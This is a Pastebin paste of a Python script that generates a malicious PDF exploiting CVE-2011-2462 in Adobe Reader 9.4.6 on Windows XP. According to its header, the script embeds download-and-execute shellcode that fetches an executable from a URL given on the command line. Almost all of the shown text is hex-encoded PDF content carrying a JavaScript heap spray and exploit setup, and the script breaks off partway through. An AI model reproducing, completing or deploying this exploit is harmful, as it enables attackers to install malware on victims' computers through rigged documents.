API tools faq
paste
Advertisement
Hector_G

PDF exploit

Hector_G
Feb 15th, 2017
180
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Python 33.58 KB | None | 0 0
raw download clone embed print report
  1. #!/usr/bin/python
  2. #
  3. # Creates PDF file that exploits CVE-2011-2462
  4. #   Works against Adobe Reader 9.4.6 and prior on Windows XP SP3
  5. #
  6. # Download&Execute shellcode, download URL is passed in as the
  7. #    first argument
  8. #
  9. # Default output file: exploit.pdf
  10. #
  11. # Contoh : ./createExploitPDF.py  http://contoh.com/folder/alone.exe
  12.  
  13.  
  14.  
  15. import sys, zlib, re, string
  16.  
  17. opdf=\
  18.     "\x25\x50\x44\x46\x2d\x31\x2e\x37\x0a\x25\xe2\xe3\xcf\xd3\x0a\x31"+\
  19.     "\x20\x30\x20\x6f\x62\x6a\x20\x0a\x3c\x3c\x0a\x2f\x4c\x65\x6e\x67"+\
  20.     "\x74\x68\x20\x35\x36\x36\x0a\x3e\x3e\x0a\x73\x74\x72\x65\x61\x6d"+\
  21.     "\x0a\x3c\x3f\x78\x6d\x6c\x20\x76\x65\x72\x73\x69\x6f\x6e\x3d\x22"+\
  22.     "\x31\x2e\x30\x22\x20\x65\x6e\x63\x6f\x64\x69\x6e\x67\x3d\x22\x55"+\
  23.     "\x54\x46\x2d\x38\x22\x3f\x3e\x0a\x20\x20\x20\x20\x3c\x78\x64\x70"+\
  24.     "\x3a\x78\x64\x70\x20\x78\x6d\x6c\x6e\x73\x3a\x78\x64\x70\x3d\x22"+\
  25.     "\x68\x74\x74\x70\x3a\x2f\x2f\x6e\x73\x2e\x61\x64\x6f\x62\x65\x2e"+\
  26.     "\x63\x6f\x6d\x2f\x78\x64\x70\x2f\x22\x3e\x0a\x20\x20\x20\x20\x20"+\
  27.     "\x20\x3c\x65\x64\x3e\x62\x32\x32\x62\x3c\x2f\x65\x64\x3e\x0a\x20"+\
  28.     "\x20\x20\x20\x20\x20\x3c\x63\x6f\x6e\x66\x69\x67\x20\x78\x6d\x63"+\
  29.     "\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\x2f\x2f\x77\x77\x77\x2e"+\
  30.     "\x6d\x69\x63\x72\x6f\x73\x6f\x66\x74\x2e\x6f\x72\x67\x2f\x73\x63"+\
  31.     "\x68\x65\x6d\x61\x2f\x78\x63\x69\x2f\x32\x2e\x36\x2f\x22\x3e\x0a"+\
  32.     "\x20\x20\x20\x20\x20\x20\x20\x20\x3c\x70\x72\x65\x73\x65\x6e\x74"+\
  33.     "\x3e\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x3c\x70\x64\x66"+\
  34.     "\x3e\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x3c\x76"+\
  35.     "\x65\x72\x73\x69\x6f\x6e\x3e\x31\x3c\x2f\x76\x65\x72\x73\x69\x6f"+\
  36.     "\x6e\x3e\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x3c"+\
  37.     "\x69\x6e\x74\x65\x72\x61\x63\x74\x69\x76\x65\x3e\x31\x3c\x2f\x69"+\
  38.     "\x6e\x74\x65\x72\x61\x63\x74\x69\x76\x65\x3e\x0a\x20\x20\x20\x20"+\
  39.     "\x20\x20\x20\x20\x20\x20\x3c\x2f\x70\x64\x66\x3e\x0a\x20\x20\x20"+\
  40.     "\x20\x20\x20\x20\x20\x3c\x2f\x70\x72\x65\x73\x65\x6e\x74\x3e\x0a"+\
  41.     "\x20\x20\x20\x20\x20\x20\x3c\x2f\x63\x6f\x6e\x66\x69\x67\x3e\x0a"+\
  42.     "\x20\x20\x20\x20\x20\x20\x3c\x74\x65\x6d\x70\x6c\x61\x74\x65\x20"+\
  43.     "\x78\x6d\x64\x66\x61\x66\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a"+\
  44.     "\x2f\x2f\x77\x77\x77\x2e\x6d\x69\x63\x72\x6f\x73\x6f\x66\x74\x2e"+\
  45.     "\x6f\x72\x67\x2f\x73\x63\x68\x65\x6d\x61\x2f\x78\x66\x66\x64\x73"+\
  46.     "\x61\x2d\x74\x65\x6d\x70\x6c\x61\x74\x65\x2f\x32\x66\x2f\x22\x3e"+\
  47.     "\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x3c\x73\x75\x62\x66\x6f\x72"+\
  48.     "\x6d\x20\x6e\x61\x6d\x65\x3d\x22\x66\x6f\x72\x6d\x31\x22\x20\x6c"+\
  49.     "\x61\x79\x6f\x75\x74\x3d\x22\x74\x62\x22\x20\x6c\x6f\x63\x61\x6c"+\
  50.     "\x65\x3d\x22\x65\x6e\x5f\x55\x53\x22\x3e\x0a\x20\x20\x20\x20\x20"+\
  51.     "\x20\x20\x20\x20\x20\x3c\x70\x61\x67\x65\x53\x65\x74\x3e\x0a\x20"+\
  52.     "\x20\x20\x20\x20\x20\x20\x20\x20\x20\x3c\x2f\x70\x61\x67\x65\x53"+\
  53.     "\x65\x74\x3e\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x3c\x2f\x73\x75"+\
  54.     "\x62\x66\x6f\x72\x6d\x3e\x0a\x20\x20\x20\x20\x20\x20\x3c\x2f\x74"+\
  55.     "\x65\x6d\x70\x6c\x61\x74\x65\x3e\x0a\x20\x20\x20\x20\x3c\x2f\x78"+\
  56.     "\x64\x70\x3a\x78\x64\x70\x3e\x0a\x65\x6e\x64\x73\x74\x72\x65\x61"+\
  57.     "\x6d\x20\x0a\x65\x6e\x64\x6f\x62\x6a\x20\x0a\x32\x20\x30\x20\x6f"+\
  58.     "\x62\x6a\x20\x0a\x3c\x3c\x0a\x2f\x58\x46\x41\x20\x31\x20\x30\x20"+\
  59.     "\x52\x0a\x3e\x3e\x0a\x65\x6e\x64\x6f\x62\x6a\x20\x0a\x33\x20\x30"+\
  60.     "\x20\x6f\x62\x6a\x20\x0a\x3c\x3c\x0a\x2f\x4f\x75\x74\x6c\x69\x6e"+\
  61.     "\x65\x73\x20\x34\x20\x30\x20\x52\x0a\x2f\x4f\x70\x65\x6e\x41\x63"+\
  62.     "\x74\x69\x6f\x6e\x20\x35\x20\x30\x20\x52\x0a\x2f\x50\x61\x67\x65"+\
  63.     "\x73\x20\x36\x20\x30\x20\x52\x0a\x2f\x41\x63\x72\x6f\x46\x6f\x72"+\
  64.     "\x6d\x20\x32\x20\x30\x20\x52\x0a\x2f\x54\x79\x70\x65\x20\x2f\x43"+\
  65.     "\x61\x74\x61\x6c\x6f\x67\x0a\x3e\x3e\x0a\x65\x6e\x64\x6f\x62\x6a"+\
  66.     "\x20\x0a\x34\x20\x30\x20\x6f\x62\x6a\x20\x0a\x3c\x3c\x0a\x2f\x43"+\
  67.     "\x6f\x75\x6e\x74\x20\x30\x0a\x2f\x54\x79\x70\x65\x20\x2f\x4f\x75"+\
  68.     "\x74\x6c\x69\x6e\x65\x73\x0a\x3e\x3e\x0a\x65\x6e\x64\x6f\x62\x6a"+\
  69.     "\x20\x0a\x36\x20\x30\x20\x6f\x62\x6a\x20\x0a\x3c\x3c\x0a\x2f\x4b"+\
  70.     "\x69\x64\x73\x20\x5b\x37\x20\x30\x20\x52\x20\x38\x20\x30\x20\x52"+\
  71.     "\x20\x39\x20\x30\x20\x52\x5d\x0a\x2f\x43\x6f\x75\x6e\x74\x20\x33"+\
  72.     "\x0a\x2f\x54\x79\x70\x65\x20\x2f\x50\x61\x67\x65\x73\x0a\x3e\x3e"+\
  73.     "\x0a\x65\x6e\x64\x6f\x62\x6a\x20\x0a\x31\x30\x20\x30\x20\x6f\x62"+\
  74.     "\x6a\x20\x0a\x3c\x3c\x0a\x2f\x4c\x65\x6e\x67\x74\x68\x20\x31\x30"+\
  75.     "\x0a\x3e\x3e\x0a\x73\x74\x72\x65\x61\x6d\x0a\x28\x42\x63\x33\x33"+\
  76.     "\x63\x29\x20\x54\x6a\x0a\x65\x6e\x64\x73\x74\x72\x65\x61\x6d\x20"+\
  77.     "\x0a\x65\x6e\x64\x6f\x62\x6a\x20\x0a\x31\x31\x20\x30\x20\x6f\x62"+\
  78.     "\x6a\x20\x0a\x3c\x3c\x0a\x2f\x50\x72\x6f\x63\x53\x65\x74\x20\x5b"+\
  79.     "\x2f\x50\x44\x46\x5d\x0a\x3e\x3e\x0a\x65\x6e\x64\x6f\x62\x6a\x20"+\
  80.     "\x0a\x38\x20\x30\x20\x6f\x62\x6a\x20\x0a\x3c\x3c\x0a\x2f\x50\x61"+\
  81.     "\x72\x65\x6e\x74\x20\x36\x20\x30\x20\x52\x0a\x2f\x52\x65\x73\x6f"+\
  82.     "\x75\x72\x63\x65\x73\x20\x31\x31\x20\x30\x20\x52\x0a\x2f\x4d\x65"+\
  83.     "\x64\x69\x61\x42\x6f\x78\x20\x5b\x30\x20\x30\x20\x36\x34\x30\x20"+\
  84.     "\x34\x38\x30\x5d\x0a\x2f\x70\x64\x66\x74\x6b\x5f\x50\x61\x67\x65"+\
  85.     "\x4e\x75\x6d\x20\x32\x0a\x2f\x43\x6f\x6e\x74\x65\x6e\x74\x73\x20"+\
  86.     "\x31\x32\x20\x30\x20\x52\x0a\x2f\x54\x79\x70\x65\x20\x2f\x50\x61"+\
  87.     "\x67\x65\x0a\x3e\x3e\x0a\x65\x6e\x64\x6f\x62\x6a\x20\x0a\x31\x33"+\
  88.     "\x20\x30\x20\x6f\x62\x6a\x20\x0a\x3c\x3c\x0a\x2f\x54\x79\x70\x65"+\
  89.     "\x20\x2f\x33\x44\x0a\x2f\x46\x69\x6c\x74\x65\x72\x20\x2f\x46\x6c"+\
  90.     "\x61\x74\x65\x44\x65\x63\x6f\x64\x65\x0a\x2f\x4c\x65\x6e\x67\x74"+\
  91.     "\x68\x20\x36\x37\x37\x0a\x2f\x53\x75\x62\x74\x79\x70\x65\x20\x2f"+\
  92.     "\x55\x33\x44\x0a\x3e\x3e\x0a\x73\x74\x72\x65\x61\x6d\x0a\x78\x01"+\
  93.     "\x0b\x35\x76\x61\x90\x60\x40\x05\x2a\x40\xae\x09\x17\x44\x2c\x0b"+\
  94.     "\x48\x89\xfc\xff\xff\xbf\x86\x11\xc2\xe7\x64\x70\x06\x02\xa7\xfc"+\
  95.     "\x0a\x03\x43\x88\x00\x90\x64\x05\x62\x25\xa0\x9a\x38\xa8\x08\x92"+\
  96.     "\x1a\xa8\x2e\x86\x46\x7b\xb8\x6a\x38\x03\xb7\x58\x48\x57\xe8\x81"+\
  97.     "\x45\x4c\x35\x87\x20\x4a\x1b\xed\xd9\x19\xc0\x16\x06\x45\x40\x8c"+\
  98.     "\x73\x01\xda\x65\x85\xdd\x2e\x90\x02\xc3\x24\x21\x6b\x11\x20\x0d"+\
  99.     "\x62\x33\x03\x71\x68\x28\x03\x83\x8f\xec\xe7\x3c\x26\x86\x0b\x4c"+\
  100.     "\x53\x19\x18\x4a\xd2\xce\x1c\x0e\x07\x0a\x33\x30\x88\x01\xcd\xb1"+\
  101.     "\x00\xb3\x40\x7e\x08\x02\x01\x90\x9e\x65\x2c\x2b\xa6\xed\xb4\x3f"+\
  102.     "\xea\xbc\xe9\xbe\x96\xe1\xd6\xb0\xc9\x0e\x60\x83\x80\xe2\x48\x4a"+\
  103.     "\x18\x19\xf4\x18\x19\xca\x40\x5a\x5d\x81\x66\x28\x83\x18\x40\x80"+\
  104.     "\xe4\x6f\x26\x88\x08\x4c\x2b\x03\x1b\xd0\x07\x60\x31\x90\x9d\x06"+\
  105.     "\x70\x49\xbc\xf6\x31\x32\x80\xa5\x11\x76\x81\xe2\xe1\x00\x24\x08"+\
  106.     "\x18\xe0\x41\x02\x34\x0b\x2a\x04\xa6\x0d\x81\x6a\x66\x63\x51\x03"+\
  107.     "\xb6\x12\x14\xb1\xa0\x90\xc9\x01\xf3\x10\x04\xcc\x00\x84\x08\x44"+\
  108.     "\x9d\x0e\x50\x02\x86\xdb\x83\xb8\x6c\x97\xb1\xe6\x5b\x83\xb0\xd7"+\
  109.     "\x57\x5d\x1b\x10\x4e\x4b\x4b\x03\xc5\xab\xfd\x37\x8d\x1a\x7b\x16"+\
  110.     "\x20\x83\x9d\x21\x38\x39\xb1\xa0\x34\x27\x11\xd9\x20\xd2\xd9\xec"+\
  111.     "\x0c\x1e\xa5\xb9\xa9\x45\xa5\xc5\x54\x31\x8f\x85\x21\x34\x27\x2f"+\
  112.     "\x11\x6e\x26\xc4\x39\x0a\x8e\xa8\x34\x71\x8e\x64\x63\x08\x4a\x4c"+\
  113.     "\xc9\x2c\x2d\x86\x18\x09\xd1\x53\x00\x35\x09\x46\x13\x67\x12\x83"+\
  114.     "\x0d\x30\x9e\xf2\x81\xc1\x0b\x02\xc8\x71\x09\x16\x00\xc5\x11\x1a"+\
  115.     "\x98\x02\xe4\x07\x00\x53\x90\x06\x50\x4f\x7d\xa9\xbe\x36\x03\x83"+\
  116.     "\x42\x31\x03\xc3\x61\x50\xd6\x03\x82\x06\x26\xd7\x27\x3e\xa1\x40"+\
  117.     "\xa9\x07\x06\xc0\x14\xbf\x01\x64\xae\x19\x58\x02\x41\x34\x84\x86"+\
  118.     "\xb2\x32\x34\x2c\xd6\x62\x38\xf0\xd0\x31\x7b\xd2\xa7\x25\x0c\x0c"+\
  119.     "\x45\xed\x12\x3e\x17\x6e\x01\x0d\x72\x5b\xc9\xcc\xe0\xd0\xc3\xc0"+\
  120.     "\xb0\xa0\x66\xe5\x72\x01\xa0\xfe\x23\x9c\x0c\x0c\xbc\x97\x02\x5a"+\
  121.     "\x99\x8b\x18\x1a\x62\xcc\x25\x0f\xee\xe4\x67\x50\x08\xfd\x2e\xcc"+\
  122.     "\xe0\xc0\x70\x47\xfe\xa7\x8e\xa9\x41\x1e\x5b\xd2\xb6\x57\x9c\x7a"+\
  123.     "\xd5\x1a\x4b\x26\x3c\xd8\x9c\xac\xa3\x30\x49\xab\x63\x0f\x9b\xd5"+\
  124.     "\xff\x06\xe7\x4d\x40\xeb\x44\x92\xf8\x92\xb7\xb0\x70\xb8\x07\x29"+\
  125.     "\x18\x9e\x62\x60\xd8\xa2\xf8\xe0\x3a\x23\xc3\x02\xa9\x22\xc1\xc2"+\
  126.     "\x43\x3a\x25\x07\x17\x87\xfd\x02\x3a\xf0\x41\xf5\x85\x24\x2d\x06"+\
  127.     "\x87\xc2\x5f\x39\xc7\xce\xb3\x57\x34\x5e\x70\xb7\x8d\xe0\x0b\xe4"+\
  128.     "\xd7\x53\xd7\xdd\xa7\x26\xc0\x96\x6f\xe5\xb0\xce\x2c\xcb\x39\xe1"+\
  129.     "\xfe\xe9\xf7\x3d\x16\xa7\x58\x26\x55\x7a\x57\xbe\x74\xda\xab\xbd"+\
  130.     "\x33\xba\x2d\x21\x75\x49\x29\xa3\xe4\xad\xf3\x59\xdf\xb5\xca\x6d"+\
  131.     "\xee\x7d\x14\x2c\x35\xbe\x3c\xa5\xc4\x4b\xa4\xd8\x5b\x62\x61\xda"+\
  132.     "\x21\xfe\x7b\xb6\x6f\x25\xaf\x18\xe9\x6d\x13\xfc\x74\x4c\x5f\x38"+\
  133.     "\x69\xe7\xd3\x87\xcc\xdd\x5b\x65\x94\xe7\x37\x30\x97\x6e\x53\xbb"+\
  134.     "\x2c\x23\x16\x3f\xdb\xe6\x55\x92\xc0\xc3\x8d\xa0\x00\x01\x00\x9c"+\
  135.     "\xf8\xe6\x50\x0a\x65\x6e\x64\x73\x74\x72\x65\x61\x6d\x20\x0a\x65"+\
  136.     "\x6e\x64\x6f\x62\x6a\x20\x0a\x31\x34\x20\x30\x20\x6f\x62\x6a\x20"+\
  137.     "\x0a\x3c\x3c\x0a\x2f\x33\x44\x41\x20\x0a\x3c\x3c\x0a\x2f\x44\x49"+\
  138.     "\x53\x20\x2f\x49\x0a\x2f\x41\x20\x2f\x50\x4f\x0a\x3e\x3e\x0a\x2f"+\
  139.     "\x46\x20\x37\x0a\x2f\x33\x44\x49\x20\x66\x61\x6c\x73\x65\x0a\x2f"+\
  140.     "\x53\x75\x62\x74\x79\x70\x65\x20\x2f\x33\x44\x0a\x2f\x33\x44\x44"+\
  141.     "\x20\x31\x33\x20\x30\x20\x52\x0a\x2f\x43\x6f\x6e\x74\x65\x6e\x74"+\
  142.     "\x73\x20\x28\x6f\x74\x68\x69\x6e\x67\x20\x62\x75\x74\x20\x63\x6f"+\
  143.     "\x6d\x6d\x65\x6e\x74\x29\x0a\x2f\x54\x79\x70\x65\x20\x2f\x41\x6e"+\
  144.     "\x6e\x6f\x74\x0a\x2f\x52\x65\x63\x74\x20\x5b\x30\x20\x30\x20\x36"+\
  145.     "\x34\x30\x20\x34\x38\x30\x5d\x0a\x3e\x3e\x0a\x65\x6e\x64\x6f\x62"+\
  146.     "\x6a\x20\x0a\x39\x20\x30\x20\x6f\x62\x6a\x20\x0a\x3c\x3c\x0a\x2f"+\
  147.     "\x50\x61\x72\x65\x6e\x74\x20\x36\x20\x30\x20\x52\x0a\x2f\x41\x6e"+\
  148.     "\x6e\x6f\x74\x73\x20\x5b\x31\x34\x20\x30\x20\x52\x5d\x0a\x2f\x52"+\
  149.     "\x65\x73\x6f\x75\x72\x63\x65\x73\x20\x31\x31\x20\x30\x20\x52\x0a"+\
  150.     "\x2f\x4d\x65\x64\x69\x61\x42\x6f\x78\x20\x5b\x30\x20\x30\x20\x36"+\
  151.     "\x34\x30\x20\x34\x38\x30\x5d\x0a\x2f\x70\x64\x66\x74\x6b\x5f\x50"+\
  152.     "\x61\x67\x65\x4e\x75\x6d\x20\x33\x0a\x2f\x43\x6f\x6e\x74\x65\x6e"+\
  153.     "\x74\x73\x20\x31\x35\x20\x30\x20\x52\x0a\x2f\x54\x79\x70\x65\x20"+\
  154.     "\x2f\x50\x61\x67\x65\x0a\x3e\x3e\x0a\x65\x6e\x64\x6f\x62\x6a\x20"+\
  155.     "\x0a\x37\x20\x30\x20\x6f\x62\x6a\x20\x0a\x3c\x3c\x0a\x2f\x50\x61"+\
  156.     "\x72\x65\x6e\x74\x20\x36\x20\x30\x20\x52\x0a\x2f\x52\x65\x73\x6f"+\
  157.     "\x75\x72\x63\x65\x73\x20\x31\x31\x20\x30\x20\x52\x0a\x2f\x4d\x65"+\
  158.     "\x64\x69\x61\x42\x6f\x78\x20\x5b\x30\x20\x30\x20\x36\x34\x30\x20"+\
  159.     "\x34\x38\x30\x5d\x0a\x2f\x70\x64\x66\x74\x6b\x5f\x50\x61\x67\x65"+\
  160.     "\x4e\x75\x6d\x20\x31\x0a\x2f\x43\x6f\x6e\x74\x65\x6e\x74\x73\x20"+\
  161.     "\x31\x30\x20\x30\x20\x52\x0a\x2f\x54\x79\x70\x65\x20\x2f\x50\x61"+\
  162.     "\x67\x65\x0a\x3e\x3e\x0a\x65\x6e\x64\x6f\x62\x6a\x20\x0a\x35\x20"+\
  163.     "\x30\x20\x6f\x62\x6a\x20\x0a\x3c\x3c\x0a\x2f\x4a\x53\x20\x31\x36"+\
  164.     "\x20\x30\x20\x52\x0a\x2f\x53\x20\x2f\x4a\x61\x76\x61\x53\x63\x72"+\
  165.     "\x69\x70\x74\x0a\x3e\x3e\x0a\x65\x6e\x64\x6f\x62\x6a\x20\x0a\x31"+\
  166.     "\x36\x20\x30\x20\x6f\x62\x6a\x20\x0a\x3c\x3c\x0a\x2f\x4c\x65\x6e"+\
  167.     "\x67\x74\x68\x20\x41\x4e\x49\x57\x41\x59\x5f\x5f\x5f\x5f\x5f\x4c"+\
  168.     "\x45\x4e\x0a\x3e\x3e\x0a\x73\x74\x72\x65\x61\x6d\x0a\x66\x75\x6e"+\
  169.     "\x63\x74\x69\x6f\x6e\x20\x75\x72\x70\x6c\x28\x6b\x2c\x73\x63\x29"+\
  170.     "\x7b\x0d\x0a\x76\x61\x72\x20\x63\x20\x3d\x20\x22\x5c\x78\x37\x35"+\
  171.     "\x22\x3b\x0d\x0a\x76\x61\x72\x20\x6b\x63\x3d\x6b\x2b\x63\x3b\x0d"+\
  172.     "\x0a\x76\x61\x72\x20\x72\x65\x20\x3d\x20\x2f\x41\x41\x2f\x67\x3b"+\
  173.     "\x0d\x0a\x73\x63\x20\x3d\x20\x73\x63\x2e\x72\x65\x70\x6c\x61\x63"+\
  174.     "\x65\x28\x72\x65\x2c\x6b\x63\x29\x3b\x0d\x0a\x72\x65\x74\x75\x72"+\
  175.     "\x6e\x20\x73\x63\x3b\x0d\x0a\x7d\x20\x0d\x0a\x70\x61\x64\x64\x69"+\
  176.     "\x6e\x67\x5f\x30\x63\x20\x3d\x20\x22\x41\x41\x30\x63\x30\x63\x41"+\
  177.     "\x41\x30\x63\x30\x63\x22\x3b\x0d\x0a\x70\x61\x64\x64\x69\x6e\x67"+\
  178.     "\x30\x30\x3d\x22\x41\x41\x30\x30\x30\x30\x22\x3b\x0d\x0a\x70\x61"+\
  179.     "\x64\x64\x69\x6e\x67\x5f\x34\x31\x20\x3d\x20\x22\x41\x41\x34\x31"+\
  180.     "\x34\x31\x22\x3b\x20\x0d\x0a\x76\x61\x72\x20\x78\x31\x3d\x30\x3b"+\
  181.     "\x0d\x0a\x76\x61\x72\x20\x78\x32\x3d\x30\x3b\x0d\x0a\x76\x61\x72"+\
  182.     "\x20\x78\x33\x3d\x30\x3b\x0d\x0a\x76\x61\x72\x20\x78\x34\x3d\x30"+\
  183.     "\x3b\x0d\x0a\x70\x61\x64\x64\x69\x6e\x67\x36\x3d\x22\x22\x3b\x70"+\
  184.     "\x61\x64\x64\x69\x6e\x67\x31\x30\x3d\x22\x22\x3b\x70\x61\x64\x64"+\
  185.     "\x69\x6e\x67\x31\x38\x3d\x22\x22\x3b\x70\x61\x64\x64\x69\x6e\x67"+\
  186.     "\x32\x3d\x22\x22\x3b\x0d\x0a\x77\x68\x69\x6c\x65\x28\x78\x31\x3c"+\
  187.     "\x36\x29\x7b\x70\x61\x64\x64\x69\x6e\x67\x36\x20\x2b\x3d\x20\x70"+\
  188.     "\x61\x64\x64\x69\x6e\x67\x5f\x34\x31\x3b\x78\x31\x20\x3d\x20\x78"+\
  189.     "\x31\x2b\x31\x3b\x7d\x0d\x0a\x77\x68\x69\x6c\x65\x28\x78\x32\x3c"+\
  190.     "\x31\x30\x29\x7b\x70\x61\x64\x64\x69\x6e\x67\x31\x30\x20\x2b\x3d"+\
  191.     "\x20\x70\x61\x64\x64\x69\x6e\x67\x5f\x34\x31\x3b\x78\x32\x20\x3d"+\
  192.     "\x20\x78\x32\x2b\x31\x3b\x7d\x0d\x0a\x77\x68\x69\x6c\x65\x28\x78"+\
  193.     "\x33\x3c\x31\x38\x29\x7b\x70\x61\x64\x64\x69\x6e\x67\x31\x38\x20"+\
  194.     "\x2b\x3d\x20\x70\x61\x64\x64\x69\x6e\x67\x5f\x34\x31\x3b\x78\x33"+\
  195.     "\x20\x3d\x20\x78\x33\x2b\x31\x3b\x7d\x0d\x0a\x77\x68\x69\x6c\x65"+\
  196.     "\x28\x78\x34\x3c\x32\x29\x7b\x70\x61\x64\x64\x69\x6e\x67\x32\x20"+\
  197.     "\x2b\x3d\x20\x70\x61\x64\x64\x69\x6e\x67\x5f\x34\x31\x3b\x78\x34"+\
  198.     "\x20\x3d\x20\x78\x34\x2b\x31\x3b\x7d\x0d\x0a\x70\x61\x64\x64\x69"+\
  199.     "\x6e\x67\x20\x3d\x20\x75\x6e\x65\x73\x63\x61\x70\x65\x28\x20\x75"+\
  200.     "\x72\x70\x6c\x28\x22\x25\x22\x2c\x70\x61\x64\x64\x69\x6e\x67\x36"+\
  201.     "\x2b\x22\x41\x41\x35\x33\x63\x33\x41\x41\x34\x61\x38\x34\x22\x2b"+\
  202.     "\x70\x61\x64\x64\x69\x6e\x67\x31\x30\x2b\x70\x61\x64\x64\x69\x6e"+\
  203.     "\x67\x5f\x30\x63\x2b\x70\x61\x64\x64\x69\x6e\x67\x32\x2b\x70\x61"+\
  204.     "\x64\x64\x69\x6e\x67\x5f\x30\x63\x2b\x70\x61\x64\x64\x69\x6e\x67"+\
  205.     "\x32\x2b\x70\x61\x64\x64\x69\x6e\x67\x5f\x30\x63\x2b\x70\x61\x64"+\
  206.     "\x64\x69\x6e\x67\x31\x38\x2b\x22\x41\x41\x30\x30\x64\x30\x41\x41"+\
  207.     "\x30\x30\x30\x31\x22\x2b\x70\x61\x64\x64\x69\x6e\x67\x36\x2b\x70"+\
  208.     "\x61\x64\x64\x69\x6e\x67\x5f\x30\x63\x29\x29\x3b\x0d\x0a\x0d\x0a"+\
  209.     "\x77\x68\x69\x6c\x65\x28\x70\x61\x64\x64\x69\x6e\x67\x2e\x6c\x65"+\
  210.     "\x6e\x67\x74\x68\x3c\x30\x78\x31\x30\x30\x30\x30\x29\x0d\x0a\x20"+\
  211.     "\x20\x20\x20\x70\x61\x64\x64\x69\x6e\x67\x20\x3d\x20\x70\x61\x64"+\
  212.     "\x64\x69\x6e\x67\x2b\x70\x61\x64\x64\x69\x6e\x67\x3b\x0d\x0a\x0a"+\
  213.     "\x66\x75\x6e\x63\x74\x69\x6f\x6e\x20\x61\x6c\x6c\x28\x62\x79\x74"+\
  214.     "\x65\x73\x29\x0d\x0a\x7b\x0d\x0a\x20\x20\x20\x20\x72\x65\x74\x75"+\
  215.     "\x72\x6e\x20\x70\x61\x64\x64\x69\x6e\x67\x2e\x73\x75\x62\x73\x74"+\
  216.     "\x72\x28\x30\x2c\x28\x62\x79\x74\x65\x73\x2d\x36\x29\x2f\x32\x29"+\
  217.     "\x3b\x0d\x0a\x7d\x0d\x0a\x20\x20\x0d\x0a\x66\x75\x6e\x63\x74\x69"+\
  218.     "\x6f\x6e\x20\x73\x70\x72\x61\x79\x28\x65\x73\x63\x41\x29\x7b\x0d"+\
  219.     "\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x76\x61\x72\x20\x69\x3b\x0d"+\
  220.     "\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x76\x61\x72\x20\x70\x6f\x69"+\
  221.     "\x6e\x74\x65\x72\x73\x41\x20\x3d\x20\x75\x6e\x65\x73\x63\x61\x70"+\
  222.     "\x65\x28\x65\x73\x63\x41\x29\x3b\x0d\x0a\x20\x20\x20\x20\x20\x20"+\
  223.     "\x20\x20\x76\x61\x72\x20\x78\x20\x3d\x20\x6e\x65\x77\x20\x41\x72"+\
  224.     "\x72\x61\x79\x28\x29\x3b\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x20"+\
  225.     "\x20\x20\x20\x20\x20\x20\x20\x66\x6f\x72\x20\x28\x69\x20\x3d\x20"+\
  226.     "\x30\x3b\x20\x69\x20\x3c\x20\x32\x30\x30\x30\x3b\x20\x69\x2b\x2b"+\
  227.     "\x29\x20\x7b\x0d\x0a\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20"+\
  228.     "\x20\x20\x20\x20\x20\x20\x20\x78\x5b\x69\x5d\x20\x3d\x20\x61\x6c"+\
  229.     "\x6c\x28\x30\x78\x38\x29\x2b\x70\x6f\x69\x6e\x74\x65\x72\x73\x41"+\
  230.     "\x3b\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20"+\
  231.     "\x20\x20\x20\x78\x5b\x69\x5d\x20\x3d\x20\x61\x6c\x6c\x28\x30\x78"+\
  232.     "\x38\x38\x29\x2b\x70\x6f\x69\x6e\x74\x65\x72\x73\x41\x3b\x0d\x0a"+\
  233.     "\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20"+\
  234.     "\x78\x5b\x69\x5d\x20\x3d\x20\x61\x6c\x6c\x28\x30\x78\x38\x38\x29"+\
  235.     "\x2b\x70\x6f\x69\x6e\x74\x65\x72\x73\x41\x3b\x0d\x0a\x20\x20\x20"+\
  236.     "\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x78\x5b\x69"+\
  237.     "\x5d\x20\x3d\x20\x61\x6c\x6c\x28\x30\x78\x38\x38\x29\x2b\x70\x6f"+\
  238.     "\x69\x6e\x74\x65\x72\x73\x41\x3b\x0d\x0a\x20\x20\x20\x20\x20\x20"+\
  239.     "\x20\x20\x20\x20\x20\x20\x7d\x0d\x0a\x20\x20\x20\x20\x7d\x3b\x0d"+\
  240.     "\x0a\x0d\x0a\x20\x0d\x0a\x76\x65\x72\x20\x3d\x20\x61\x70\x70\x2e"+\
  241.     "\x76\x69\x65\x77\x65\x72\x56\x65\x72\x73\x69\x6f\x6e\x0d\x0a\x0d"+\
  242.     "\x0a\x76\x61\x72\x20\x61\x31\x31\x2c\x62\x32\x32\x2c\x63\x33\x33"+\
  243.     "\x2c\x64\x64\x64\x2c\x65\x65\x65\x2c\x66\x66\x66\x2c\x67\x67\x67"+\
  244.     "\x2c\x68\x68\x68\x3b\x0d\x0a\x76\x61\x72\x20\x74\x3d\x30\x3b\x0d"+\
  245.     "\x0a\x76\x61\x72\x20\x69\x31\x3d\x30\x78\x30\x63\x30\x63\x2d\x30"+\
  246.     "\x78\x32\x34\x3b\x0d\x0a\x76\x61\x72\x20\x69\x32\x3d\x30\x78\x34"+\
  247.     "\x30\x30\x30\x2b\x30\x78\x63\x30\x30\x30\x3b\x0d\x0a\x76\x61\x72"+\
  248.     "\x20\x69\x33\x3d\x28\x30\x78\x31\x30\x32\x30\x2d\x30\x78\x30\x38"+\
  249.     "\x29\x2f\x32\x3b\x0d\x0a\x0d\x0a\x66\x75\x6e\x63\x74\x69\x6f\x6e"+\
  250.     "\x20\x66\x69\x6c\x6c\x31\x28\x70\x70\x70\x29\x7b\x20\x61\x31\x31"+\
  251.     "\x20\x3d\x20\x70\x70\x70\x3b\x7d\x0d\x0a\x66\x75\x6e\x63\x74\x69"+\
